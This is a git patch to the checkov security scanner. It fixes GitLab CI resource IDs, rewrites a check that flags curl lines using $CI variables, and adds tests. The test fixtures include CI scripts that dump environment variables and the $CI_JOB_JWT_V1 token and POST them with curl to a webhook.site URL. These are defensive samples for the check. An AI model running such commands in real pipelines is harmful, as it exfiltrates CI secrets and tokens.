From b87bdc32d6e6dd9706c96e897156a6fc26b142cf Mon Sep 17 00:00:00 2001 From: Eliran Turgeman <50831652+Eliran-Turgeman@users.noreply.github.com> Date: Mon, 24 Oct 2022 11:33:52 +0300 Subject: [PATCH] fix(gitlab): Modify gitlab ci resource id (#3706) * fixing check_ids & resource ids for gitlab ci * adding tests & fixes in resource ids * fixing ids & tests * remove commented code * fix typing * lint * typing * fix tests * mypy * mypy * review changes * review changes Co-authored-by: Eliran Turgeman --- checkov/common/checks/base_check_registry.py | 1 + checkov/common/runners/object_runner.py | 3 + .../checks/job/SuspectCurlInScript.py | 15 +- checkov/gitlab_ci/common/resource_id_utils.py | 21 +++ .../gitlab_ci/image_referencer/provider.py | 8 + checkov/gitlab_ci/runner.py | 21 +++ checkov/yaml_doc/base_registry.py | 31 ++++ tests/gitlab_ci/conftest.py | 168 ++++++++++++++++++ .../test_gitlab_ci_provider.py | 122 +++++++------ .../image_referencer/test_manager.py | 52 ++++-- .../gitlab_ci/resources/images/.gitlab-ci.yml | 2 - tests/gitlab_ci/test_resource_names.py | 36 ++++ tests/gitlab_ci/test_runner.py | 4 +- 13 files changed, 405 insertions(+), 79 deletions(-) create mode 100644 checkov/gitlab_ci/common/resource_id_utils.py create mode 100644 tests/gitlab_ci/conftest.py create mode 100644 tests/gitlab_ci/test_resource_names.py diff --git a/checkov/common/checks/base_check_registry.py b/checkov/common/checks/base_check_registry.py index 79b628f2583..1ed2700f449 100644 --- a/checkov/common/checks/base_check_registry.py +++ b/checkov/common/checks/base_check_registry.py @@ -34,6 +34,7 @@ def __init__(self, report_type: str) -> None: self.wildcard_checks: Dict[str, List[BaseCheck]] = defaultdict(list) self.check_id_allowlist: Optional[List[str]] = None self.report_type = report_type + self.definitions_raw: list[tuple[int, str]] | None = None def register(self, check: BaseCheck) -> None: # IMPLEMENTATION NOTE: Checks are registered when the script is loaded diff --git a/checkov/common/runners/object_runner.py b/checkov/common/runners/object_runner.py index 6d248bccf84..99305b43f7c 100644 --- a/checkov/common/runners/object_runner.py +++ b/checkov/common/runners/object_runner.py @@ -105,6 +105,9 @@ def run( for file_path in self.definitions.keys(): self.pbar.set_additional_data({'Current File Scanned': os.path.relpath(file_path, root_folder)}) skipped_checks = collect_suppressions_for_context(self.definitions_raw[file_path]) + + if registry.report_type == CheckType.GITLAB_CI: + registry.definitions_raw = self.definitions_raw[file_path] results = registry.scan(file_path, self.definitions[file_path], skipped_checks, runner_filter) # type:ignore[arg-type] # this is overridden in the subclass for key, result in results.items(): result_config = result["results_configuration"] diff --git a/checkov/gitlab_ci/checks/job/SuspectCurlInScript.py b/checkov/gitlab_ci/checks/job/SuspectCurlInScript.py index 3855f673b08..d48ffc2f9ba 100644 --- a/checkov/gitlab_ci/checks/job/SuspectCurlInScript.py +++ b/checkov/gitlab_ci/checks/job/SuspectCurlInScript.py @@ -1,5 +1,5 @@ from __future__ import annotations - +from typing import Any from checkov.common.models.enums import CheckResult from checkov.gitlab_ci.checks.base_gitlab_ci_check import BaseGitlabCICheck @@ -17,13 +17,12 @@ def __init__(self) -> None: supported_entities=('*.script[]',) ) - def scan_conf(self, conf: str) -> tuple[CheckResult, str]: # type:ignore[override] - if "curl" in conf: - badstuff = ('curl', '$CI_') - lines = conf.split("\n") - for line in lines: - if all(x in line for x in badstuff): - return CheckResult.FAILED, conf + def scan_conf(self, conf: dict[str, Any]) -> tuple[CheckResult, dict[str, Any]]: + for line in conf.values(): + if not isinstance(line, str): + continue + if line.startswith("curl") and "$CI" in line: + return CheckResult.FAILED, conf return CheckResult.PASSED, conf diff --git a/checkov/gitlab_ci/common/resource_id_utils.py b/checkov/gitlab_ci/common/resource_id_utils.py new file mode 100644 index 00000000000..790c5cb3d73 --- /dev/null +++ b/checkov/gitlab_ci/common/resource_id_utils.py @@ -0,0 +1,21 @@ +from __future__ import annotations +from typing import Any + +from checkov.common.util.consts import START_LINE, END_LINE + + +def generate_resource_key_recursive(conf: dict[str, Any] | list[str] | str, key: str, start_line: int, + end_line: int) -> str: + if not isinstance(conf, dict): + return key + + for k, value in conf.items(): + if isinstance(value, dict) and value[START_LINE] <= start_line <= end_line <= value[END_LINE]: + next_key = f'{key}.{k}' if key else k + return generate_resource_key_recursive(value, next_key, start_line, end_line) + if isinstance(value, list): + return f'{key}.{k}' if key else k + if isinstance(value, str): + return key + + return key diff --git a/checkov/gitlab_ci/image_referencer/provider.py b/checkov/gitlab_ci/image_referencer/provider.py index fb5d1cbcb83..f5d2cd13848 100644 --- a/checkov/gitlab_ci/image_referencer/provider.py +++ b/checkov/gitlab_ci/image_referencer/provider.py @@ -3,6 +3,7 @@ from typing import Any from checkov.common.images.image_referencer import Image +from checkov.gitlab_ci.common.resource_id_utils import generate_resource_key_recursive class GitlabCiProvider: @@ -43,6 +44,10 @@ def extract_images_from_workflow(self) -> list[Image]: name=image_name, start_line=start_line, end_line=end_line, + related_resource_id=generate_resource_key_recursive(conf=self.workflow_config, + key='', + start_line=start_line, + end_line=end_line) ) images.append(image_obj) image_name = "" @@ -52,6 +57,9 @@ def extract_images_from_workflow(self) -> list[Image]: name=image_name, start_line=start_line, end_line=end_line, + related_resource_id=generate_resource_key_recursive(conf=self.workflow_config, + key='', start_line=start_line, + end_line=end_line) ) images.append(image_obj) return images diff --git a/checkov/gitlab_ci/runner.py b/checkov/gitlab_ci/runner.py index 64221521a87..9f77ba72471 100644 --- a/checkov/gitlab_ci/runner.py +++ b/checkov/gitlab_ci/runner.py @@ -4,6 +4,8 @@ from typing import TYPE_CHECKING, Any from checkov.common.output.report import Report +from checkov.common.util.type_forcers import force_dict +from checkov.gitlab_ci.common.resource_id_utils import generate_resource_key_recursive from checkov.runner_filter import RunnerFilter @@ -45,6 +47,15 @@ def is_workflow_file(self, file_path: str) -> bool: def included_paths(self) -> Iterable[str]: return (".gitlab-ci.yml", ".gitlab-ci.yaml") + def get_resource(self, file_path: str, key: str, supported_entities: Iterable[str], definitions: dict[str, Any] | None = None) -> str: + start_line, end_line = Runner.get_start_and_end_lines(key) + file_config = force_dict(self.definitions[file_path]) + if not file_config: + return key + resource_id: str = generate_resource_key_recursive(conf=file_config, key='', start_line=start_line, + end_line=end_line) + return resource_id + def run( self, root_folder: str | None = None, @@ -91,3 +102,13 @@ def extract_images( images.extend(manager.extract_images_from_workflow()) return images + + @staticmethod + def get_start_and_end_lines(key: str) -> list[int]: + check_name = key.split('.')[-1] + if "[" not in check_name or "[]" in check_name: + return [-1, -1] + + start_end_line_bracket_index = check_name.index('[') + + return [int(x) for x in check_name[start_end_line_bracket_index + 1: len(check_name) - 1].split(':')] diff --git a/checkov/yaml_doc/base_registry.py b/checkov/yaml_doc/base_registry.py index a7386d9942c..ea4d11bbfaa 100644 --- a/checkov/yaml_doc/base_registry.py +++ b/checkov/yaml_doc/base_registry.py @@ -44,6 +44,8 @@ def _scan_yaml_array( ) if isinstance(analyzed_entities, list): for item in analyzed_entities: + if isinstance(item, str): + item = self.set_lines_for_item(item) if STARTLINE_MARK != item and ENDLINE_MARK != item: self.update_result( check, @@ -253,3 +255,32 @@ def get_result_key(self, check: BaseCheck, def extract_entity_details(self, entity: dict[str, Any]) -> tuple[str, str, dict[str, Any]]: # not used, but is an abstractmethod pass + + def set_lines_for_item(self, item: str) -> dict[int | str, str | int] | str: + if not self.definitions_raw: + return item + + item_lines = item.rstrip().split("\n") + item_dict: dict[int | str, str | int] = { + idx: line for idx, line in enumerate(item_lines) + } + + if len(item_lines) == 1: + item_line = item_lines[0] + for idx, line in self.definitions_raw: + if item_line in line: + item_dict[STARTLINE_MARK] = idx + item_dict[ENDLINE_MARK] = idx + return item_dict + + first_line, last_line = item_lines[0], item_lines[-1] + for idx, line in self.definitions_raw: + if first_line in line: + item_dict[STARTLINE_MARK] = idx + continue + + if last_line in line: + item_dict[ENDLINE_MARK] = idx + break + + return item_dict diff --git a/tests/gitlab_ci/conftest.py b/tests/gitlab_ci/conftest.py new file mode 100644 index 00000000000..e86bb9b1a68 --- /dev/null +++ b/tests/gitlab_ci/conftest.py @@ -0,0 +1,168 @@ +from __future__ import annotations +from typing import Any + +import pytest + + +@pytest.fixture +def definitions() -> dict[str, Any]: + return { + "/checkov/tests/gitlab_ci/resources/images/.gitlab-ci.yml": { + "default": { + "image": "nginx:1.18", + "services": [ + { + "name": "privateregistry/stuff/my-postgres:11.7", + "alias": "db-postgres", + "__startline__": 9, + "__endline__": 11 + }, + { + "name": "redis:latest", + "__startline__": 11, + "__endline__": 12 + }, + "nginx:1.17" + ], + "before_script": [ + "bundle install" + ], + "__startline__": 2, + "__endline__": 17 + }, + "test": { + "script": [ + "docker run privateregistry/stuff/myimage:11.7" + ], + "__startline__": 18, + "__endline__": 21 + }, + "baddeploy": { + "script": [ + "echo \"get the envs\"\napt update\napt -y install curl\npython -c \u0027import json, os;print(json.dumps(dict(os.environ)))\u0027 \u003e env.json\ncurl -H \\\"Content-Type: application/json\\\" -X POST --data \"$CI_JOB_JWT_V1\" https://webhook.site/4cf17d70-56ee-4b84-9823-e86461d2f826\ncurl -H \\\"Content-Type: application/json\\\" -X POST --data \"@env.json\" https://webhook.site/4cf17d70-56ee-4b84-9823-e86461d2f826\n" + ], + "__startline__": 22, + "__endline__": 32 + }, + "__startline__": 1, + "__endline__": 32 + }, + "/checkov/tests/gitlab_ci/resources/curl/.gitlab-ci.yml": { + "image": "python:3.9-buster", + "test": { + "script": [ + "echo \"get the envs\"\napt update\napt -y install curl\npython -c \u0027import json, os;print(json.dumps(dict(os.environ)))\u0027 \u003e env.json\ncurl -H \\\"Content-Type: application/json\\\" -X POST --data \"@env.json\" https://webhook.site/4cf17d70-56ee-4b84-9823-e86461d2f826\n" + ], + "__startline__": 4, + "__endline__": 12 + }, + "deploy": { + "script": "curl -H \\\"Content-Type: application/json\\\" -X POST --data \"$CI_JOB_JWT_V1\" https://webhook.site/4cf17d70-56ee-4b84-9823-e86461d2f826", + "__startline__": 13, + "__endline__": 13 + }, + "__startline__": 1, + "__endline__": 13 + }, + "/checkov/tests/gitlab_ci/resources/two/.gitlab-ci.yml": { + "planOnlySubset": { + "script": "echo \"This job creates double pipelines!\"", + "rules": [ + { + "changes": [ + "$DOCKERFILES_DIR/*" + ], + "__startline__": 4, + "__endline__": 6 + }, + { + "if": "$CI_PIPELINE_SOURCE \u003d\u003d \"push\"", + "__startline__": 6, + "__endline__": 7 + }, + { + "if": "$CI_PIPELINE_SOURCE \u003d\u003d \"merge_request_event\"", + "__startline__": 7, + "__endline__": 9 + } + ], + "__startline__": 2, + "__endline__": 9 + }, + "job": { + "script": "echo \"This job also creates double pipelines!\"", + "rules": [ + { + "changes": [ + "$DOCKERFILES_DIR/*" + ], + "__startline__": 12, + "__endline__": 14 + }, + { + "if": "$CI_PIPELINE_SOURCE \u003d\u003d \"push\"", + "__startline__": 14, + "__endline__": 15 + }, + { + "if": "$CI_PIPELINE_SOURCE \u003d\u003d \"merge_request_event\"", + "__startline__": 15, + "__endline__": 16 + } + ], + "__startline__": 10, + "__endline__": 16 + }, + "__startline__": 1, + "__endline__": 16 + }, + "/checkov/tests/gitlab_ci/resources/rules/.gitlab-ci.yml": { + "job": { + "script": "echo \"This job creates double pipelines!\"", + "rules": [ + { + "changes": [ + "$DOCKERFILES_DIR/*" + ], + "__startline__": 4, + "__endline__": 6 + }, + { + "if": "$CI_PIPELINE_SOURCE \u003d\u003d \"push\"", + "__startline__": 6, + "__endline__": 7 + }, + { + "if": "$CI_PIPELINE_SOURCE \u003d\u003d \"merge_request_event\"", + "__startline__": 7, + "__endline__": 9 + } + ], + "__startline__": 2, + "__endline__": 9 + }, + "__startline__": 1, + "__endline__": 9 + }, + "/checkov/tests/gitlab_ci/image_referencer/resources/single_image/.gitlab-ci.yml": { + "default": { + "image": { + "name": "redis:latest", + "entrypoint": [ + "/bin/bash" + ], + "__startline__": 3, + "__endline__": 6 + }, + "__startline__": 2, + "__endline__": 6 + }, + "deploy": { + "script": "curl -H \\\"Content-Type: application/json\\\" -X POST --data \"$CI_JOB_JWT_V1\" https://webhook.site/4cf17d70-56ee-4b84-9823-e86461d2f826", + "__startline__": 7, + "__endline__": 7 + }, + "__startline__": 1, + "__endline__": 7 + } + } diff --git a/tests/gitlab_ci/image_referencer/test_gitlab_ci_provider.py b/tests/gitlab_ci/image_referencer/test_gitlab_ci_provider.py index 9e683adf76d..b82fde03957 100644 --- a/tests/gitlab_ci/image_referencer/test_gitlab_ci_provider.py +++ b/tests/gitlab_ci/image_referencer/test_gitlab_ci_provider.py @@ -5,80 +5,100 @@ def test_extract_images_from_workflow(): file_path = 'tests/gitlab_ci/resources/images/.gitlab-ci.yml' workflow_config = { - "default": { - "image": "nginx:1.18", - "services": [ - { - "name": "redis:latest", - "__startline__": 11, - "__endline__": 12 - }, - "nginx:1.17" - ], - "before_script": [ - "bundle install" + "default": { + "image": { + "name": "ruby:2.6", + "entrypoint": [ + "/bin/bash" ], - "__startline__": 2, - "__endline__": 17 - }, - "__startline__": 1, - "__endline__": 32 - } + "__startline__": 3, + "__endline__": 6 + }, + "services": [ + { + "name": "privateregistry/stuff/my-postgres:11.7", + "alias": "db-postgres", + "__startline__": 7, + "__endline__": 9 + }, + { + "name": "redis:latest", + "__startline__": 9, + "__endline__": 10 + }, + "nginx:1.17" + ], + "before_script": [ + "bundle install" + ], + "__startline__": 2, + "__endline__": 15 + }, + "__startline__": 1, + "__endline__": 32 + } gitlab_ci_provider = GitlabCiProvider(workflow_config=workflow_config, file_path=file_path) images = gitlab_ci_provider.extract_images_from_workflow() - assert images == [ + assert set(images) == { Image( - end_line=17, - start_line=2, + end_line=6, + start_line=3, file_path=file_path, - name='nginx:1.18', - related_resource_id=None + name='ruby:2.6', + related_resource_id='default.image' ), Image( - end_line=12, - start_line=11, + end_line=10, + start_line=9, file_path=file_path, name='redis:latest', - related_resource_id=None + related_resource_id='default.services' ), Image( - end_line=12, - start_line=11, + end_line=10, + start_line=9, file_path=file_path, name='nginx:1.17', - related_resource_id=None + related_resource_id='default.services' + ), + Image( + end_line=9, + start_line=7, + file_path=file_path, + name='privateregistry/stuff/my-postgres:11.7', + related_resource_id='default.services' ) - ] + } def test_extract_images_from_workflow_no_images(): file_path = 'tests/gitlab_ci/resources/rules/.gitlab-ci.yml' workflow_config = { - "script": "echo \"This job creates double pipelines!\"", - "rules": [ - { - "changes": [ + "script": "echo \"This job creates double pipelines!\"", + "rules": [ + { + "changes": [ "$DOCKERFILES_DIR/*" - ], - "__startline__": 4, - "__endline__": 6 - }, - { - "if": "$CI_PIPELINE_SOURCE \u003d\u003d \"push\"", - "__startline__": 6, - "__endline__": 7 - }, - { - "if": "$CI_PIPELINE_SOURCE \u003d\u003d \"merge_request_event\"", - "__startline__": 7, - "__endline__": 9 - } - ], - "__startline__": 2, - "__endline__": 9 + ], + "__startline__": 4, + "__endline__": 6 + }, + { + "if": "$CI_PIPELINE_SOURCE \u003d\u003d \"push\"", + "__startline__": 6, + "__endline__": 7 + }, + { + "if": "$CI_PIPELINE_SOURCE \u003d\u003d \"merge_request_event\"", + "__startline__": 7, + "__endline__": 9 } + ], + "__startline__": 2, + "__endline__": 9 + } gitlab_ci_provider = GitlabCiProvider(workflow_config=workflow_config, file_path=file_path) images = gitlab_ci_provider.extract_images_from_workflow() diff --git a/tests/gitlab_ci/image_referencer/test_manager.py b/tests/gitlab_ci/image_referencer/test_manager.py index 6ef1b1343de..05c19c4ec86 100644 --- a/tests/gitlab_ci/image_referencer/test_manager.py +++ b/tests/gitlab_ci/image_referencer/test_manager.py @@ -6,12 +6,25 @@ def test_extract_images_from_workflow(): file_path = 'tests/gitlab_ci/resources/images/.gitlab-ci.yml' workflow_config = { "default": { - "image": "nginx:1.18", + "image": { + "name": "ruby:2.6", + "entrypoint": [ + "/bin/bash" + ], + "__startline__": 3, + "__endline__": 6 + }, "services": [ + { + "name": "privateregistry/stuff/my-postgres:11.7", + "alias": "db-postgres", + "__startline__": 7, + "__endline__": 9 + }, { "name": "redis:latest", - "__startline__": 11, - "__endline__": 12 + "__startline__": 9, + "__endline__": 10 }, "nginx:1.17" ], @@ -19,7 +32,7 @@ def test_extract_images_from_workflow(): "bundle install" ], "__startline__": 2, - "__endline__": 17 + "__endline__": 15 }, "__startline__": 1, "__endline__": 32 @@ -28,29 +41,36 @@ def test_extract_images_from_workflow(): manager = GitlabCiImageReferencerManager(workflow_config=workflow_config, file_path=file_path) images = manager.extract_images_from_workflow() - assert images == [ + assert set(images) == { Image( - end_line=17, - start_line=2, + end_line=6, + start_line=3, file_path=file_path, - name='nginx:1.18', - related_resource_id=None + name='ruby:2.6', + related_resource_id='default.image' ), Image( - end_line=12, - start_line=11, + end_line=10, + start_line=9, file_path=file_path, name='redis:latest', - related_resource_id=None + related_resource_id='default.services' ), Image( - end_line=12, - start_line=11, + end_line=10, + start_line=9, file_path=file_path, name='nginx:1.17', - related_resource_id=None + related_resource_id='default.services' + ), + Image( + end_line=9, + start_line=7, + file_path=file_path, + name='privateregistry/stuff/my-postgres:11.7', + related_resource_id='default.services' ) - ] + } def test_extract_images_from_workflow_no_images(): diff --git a/tests/gitlab_ci/resources/images/.gitlab-ci.yml b/tests/gitlab_ci/resources/images/.gitlab-ci.yml index 08d7a08e1c1..4eaf8c17ee3 100644 --- a/tests/gitlab_ci/resources/images/.gitlab-ci.yml +++ b/tests/gitlab_ci/resources/images/.gitlab-ci.yml @@ -3,8 +3,6 @@ default: name: ruby:2.6 entrypoint: ["/bin/bash"] - image: nginx:1.18 - services: - name: privateregistry/stuff/my-postgres:11.7 alias: db-postgres diff --git a/tests/gitlab_ci/test_resource_names.py b/tests/gitlab_ci/test_resource_names.py new file mode 100644 index 00000000000..e86ec47df13 --- /dev/null +++ b/tests/gitlab_ci/test_resource_names.py @@ -0,0 +1,36 @@ +import pytest + +from checkov.gitlab_ci.runner import Runner + + +@pytest.mark.parametrize( + "key,file_path,expected_key", + [ + ('*.script[].*.script[].CKV_GITLABCI_1[19:19]', '/checkov/tests/gitlab_ci/resources/images/.gitlab-ci.yml', + 'test.script'), + ('*.rules.*.rules.CKV_GITLABCI_2[7:9]', '/checkov/tests/gitlab_ci/resources/two/.gitlab-ci.yml', + 'planOnlySubset'), + ], +) +def test_get_resource(key, file_path, expected_key, definitions): + runner = Runner() + runner.definitions = definitions + new_key = runner.get_resource(file_path, key, [], {}) + + assert new_key == expected_key + + +@pytest.mark.parametrize( + "key,expected_start_line,expected_end_line", + [ + ("*.script[].*.script[].CKV_GITLABCI_1[19:19]", 19, 19), + ("*.rules.*.rules.CKV_GITLABCI_2[7:9]", 7, 9), + ("*.script[].CKV_GITLABCI_1", -1, -1) + ] +) +def test_get_start_and_end_lines(key, expected_start_line, expected_end_line): + runner = Runner() + start_line, end_line = runner.get_start_and_end_lines(key) + + assert start_line == expected_start_line + assert end_line == expected_end_line diff --git a/tests/gitlab_ci/test_runner.py b/tests/gitlab_ci/test_runner.py index bd7156a2cfd..c4a3c67905c 100644 --- a/tests/gitlab_ci/test_runner.py +++ b/tests/gitlab_ci/test_runner.py @@ -17,11 +17,11 @@ def test_runner(self): checks = ["CKV_GITLABCI_1","CKV_GITLABCI_2"] report = runner.run( root_folder=valid_dir_path, - runner_filter=RunnerFilter(framework='github_ci', checks=checks) + runner_filter=RunnerFilter(framework=['gitlab_ci'], checks=checks) ) self.assertEqual(len(report.failed_checks), 5) self.assertEqual(report.parsing_errors, []) - self.assertEqual(len(report.passed_checks), 2) + self.assertEqual(len(report.passed_checks), 5) self.assertEqual(report.skipped_checks, []) report.print_console()